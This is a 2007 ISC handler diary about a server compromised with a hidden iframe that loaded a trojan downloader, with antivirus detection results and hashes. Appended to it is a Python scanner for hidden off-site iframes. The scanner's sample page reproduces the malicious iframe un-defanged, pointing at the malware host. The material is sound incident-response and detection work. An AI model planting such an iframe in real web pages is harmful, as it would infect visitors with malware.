Another iframe on a compromised server pointing to JavaScript which then downloads malware. Jeff wrote in to tell us about a web server that had an iframe like this (tags and URLs defanged):

<bo dy><i frame src='hxxp:// 81.95.149.28/logo/ index.php' width='1' height='1' style='visibility: hidden;'></i frame>

The unencoded JavaScript at hxxp:// 81.95.149.28/logo/ index.php then downloaded and ran hxxp:// 81.95.149.28/logo/ file.php, a binary PE trojan. Here is what VirusTotal had to say about file.php:

Engine             Version       Updated     Result
AntiVir            7.4.0.32      06.05.2007  TR/Small.MI.25
AVG                7.5.0.467     06.05.2007  Generic4.SJO
BitDefender        7.2           06.05.2007  Trojan.Agent.AXB
DrWeb              4.33          06.05.2007  Trojan.DownLoader.23162
eSafe              7.0.15.0      06.05.2007  Win32.Small.mi
eTrust-Vet         30.7.3693     06.05.2007  Win32/Chepvil!generic
Ewido              4.0           06.05.2007  Trojan.Small.mi
F-Secure           6.70.13030.0  06.05.2007  Trojan.Win32.Small.mi
Ikarus             T3.1.1.8      06.05.2007  Trojan.Win32.Small.mi
Kaspersky          4.0.2.24      06.05.2007  Trojan.Win32.Small.mi
Microsoft          1.2503        06.05.2007  TrojanDownloader:Win32/Agent!EF3C
Norman             5.80.02       06.05.2007  W32/Smalltroj.BHMK
Prevx1             V2            06.05.2007  Polynomial.Code.Exploit
Sophos             4.18.0        06.01.2007  Mal/Clagger-E
TheHacker          6.1.6.129     06.04.2007  Trojan/Small.mi
VirusBuster        4.3.23:9      06.05.2007  no virus found
Webwasher-Gateway  6.0.1         06.05.2007  Trojan.Small.MI.25

Additional information:
File size: 6767 bytes
MD5: 3cefdebc529c408c8ba9ef20a0b6291c
SHA1: 4d3599829828e90f6e27b886c9ee403163fc91f6
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PXC=e09499856113

The server has since had the iframe removed. The owner was a little less than gracious when we spoke this morning. He was aware that it was compromised and was infecting web users. If you are notified that a system you run or own is involved in an incident, please take action as soon as you can.

Cheers,
Adrien
Adrien de Beaupre, ISC Handler, Jun 5th 2007
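The injected frame above has the two traits that make this kind of compromise easy to hunt for in your own site's HTML: it is sized to a single pixel and styled invisible, and it points off-site. The following scanner is an added example for this diary, not code from ISC or the reporter; it flags iframes with those traits so a web server owner can check their pages before a visitor (or a third party) reports them. The sample page is constructed; the hidden frame in it copies the one the diary describes, with the diary's 81.95.149.28 address, and the site host name www.example.com is an assumption.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline styles commonly used to keep an injected iframe out of sight
HIDDEN_STYLE_RE = re.compile(r"(visibility\s*:\s*hidden|display\s*:\s*none)", re.I)


def _px(value):
    """Return the leading integer of a width/height attribute ('1', '1px'), or None."""
    if value is None:
        return None
    m = re.match(r"\s*(\d+)", value)
    return int(m.group(1)) if m else None


class HiddenIframeFinder(HTMLParser):
    """Collects <iframe> tags that are sized or styled so the visitor never sees them."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        reasons = []
        w, h = _px(a.get("width")), _px(a.get("height"))
        if (w is not None and w <= 1) or (h is not None and h <= 1):
            reasons.append("1x1 or zero size")
        if HIDDEN_STYLE_RE.search(a.get("style", "")):
            reasons.append("hidden by style")
        if not reasons:
            return  # a normally sized, visible iframe is not what we are hunting
        src = a.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        self.findings.append({
            "src": src,
            "line": self.getpos()[0],
            "reasons": reasons,
            # an off-site destination is the strongest sign of an injection
            "external": bool(host) and host != self.site_host,
        })


def find_hidden_iframes(html, site_host):
    """Return the suspicious iframes found in `html` for a site served as `site_host`."""
    p = HiddenIframeFinder(site_host)
    p.feed(html)
    p.close()
    return p.findings


# Constructed sample page (not a real site): the hidden frame mirrors the one in
# the diary, using the 81.95.149.28 address the diary names; the rest is ordinary.
SAMPLE_PAGE = """<html><body>
<h1>Welcome</h1>
<iframe src="/news/embed.html" width="600" height="400"></iframe>
<iframe src='http://81.95.149.28/logo/index.php' width='1' height='1' style='visibility: hidden;'></iframe>
<iframe src="http://www.example.com/help" style="display:none"></iframe>
</body></html>"""

if __name__ == "__main__":
    # Assumed site host: www.example.com
    for f in find_hidden_iframes(SAMPLE_PAGE, "www.example.com"):
        flag = "EXTERNAL" if f["external"] else "same-site"
        print(f"line {f['line']}: {flag} {f['src']} ({', '.join(f['reasons'])})")
```

Run it over the files under your document root (or over a saved copy of each page as the web server actually serves it, since injected content is sometimes added at request time). A same-site hidden iframe can be legitimate; an off-site one that you did not put there is the case in this diary.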